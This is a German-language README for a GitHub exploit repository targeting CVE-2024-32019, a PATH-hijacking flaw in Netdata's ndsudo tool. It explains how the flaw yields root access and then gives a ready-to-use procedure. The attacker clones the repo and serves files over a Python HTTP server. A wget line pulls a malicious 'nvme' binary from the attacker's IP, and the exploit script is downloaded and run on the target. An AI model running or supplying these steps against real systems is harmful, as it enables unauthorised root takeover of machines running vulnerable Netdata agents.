
# Bash-basierter Privilege-Escalation-Exploit für CVE-2024-32019 im ndsudo-Tool des Netdata-Agents, der eine unsichere PATH-Suche ausnutzt, um beliebige Binärdateien mit Root-Berechtigungen auszuführen.
Die ndsudo-Schwachstelle ermöglicht es einem Angreifer, Root-Berechtigungen zu erlangen, indem er einen nicht vertrauenswürdigen Suchpfad im ndsudo-Tool ausnutzt, das Teil des Netdata-Agents ist. Dies kann die Ausführung beliebiger Programme mit erhöhten Rechten ermöglichen, wenn der Angreifer eine schädliche Binärdatei in einem beschreibbaren Verzeichnis platziert und die PATH-Umgebungsvariable entsprechend ändert.
Die ndsudo-Schwachstelle, identifiziert als CVE-2024-32019, betrifft Versionen des ndsudo-Tools, die im Netdata-Agent enthalten sind, insbesondere Versionen v1.45.0 und darunter. Diese Schwachstelle ermöglicht es Angreifern, ihre Privilegien auf Systemen, auf denen das Tool installiert ist, zu erweitern.
Wie die Schwachstelle funktioniert:
Mechanismus der Ausnutzung:-
Nicht vertrauenswürdiger Suchpfad: Das ndsudo-Tool verwendet die PATH-Umgebungsvariable, um externe Befehle zu finden. Ein Angreifer kann diese Variable manipulieren, um auf ein von ihm kontrolliertes Verzeichnis zu verweisen.
Ausführung schädlicher Binärdateien: Indem der Angreifer eine ausführbare Datei mit demselben Namen wie ein Befehl, den ndsudo ausführen darf (z. B. nvme), in einem beschreibbaren Verzeichnis platziert, kann er beliebigen Code mit Root-Berechtigungen ausführen.
Angriffskomplexität:-
Geringe Komplexität: Der Angriff erfordert keine fortgeschrittenen Fähigkeiten, ein einfach erstelltes Bash-Skript kann für Privilege Escalation verwendet werden, was ihn für viele potenzielle Angreifer zugänglich macht.
Auswirkungen der Schwachstelle:-
Privilege Escalation: Eine erfolgreiche Ausnutzung ermöglicht es einem Angreifer, Root-Zugriff zu erlangen, was zur vollständigen Kontrolle über das betroffene System führen kann.
Potenzielle Risiken: Dies kann zu unbefugtem Datenzugriff, Systemmanipulation und weiterer Ausnutzung von Netzwerkressourcen führen.
PRIVILEGE ESCALATION Ich habe zwei Bash-Skripte erstellt, um einfach vom Benutzer zum Root-Zugang zu gelangen. Befolge die folgenden Schritte :-
git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git
cd CVE-2024-32019-ndsudo
chmod +x ndsudo_exp.sh
Erstelle nun einen Python-Server :
python3 -m http.server 8080
Öffne die Datei ndsudo_exploit.sh mit gedit oder pluma, je nachdem, was verfügbar ist. Du wirst den wget-Befehl wie folgt sehen :
wget http://10.10.14.70:8080/nvme -o /tmp/nvme
Ändere die IP-Adresse in die IP-Adresse deiner eigenen Maschine.
Gehe nun zur Zielmaschine, öffne ein Terminal und führe Folgendes aus:
wget http://<your-ip-addr>:8080/ndsudo_exploit.sh
chmod +x ndsudo_exploit.sh
./ndsudo_exploit.sh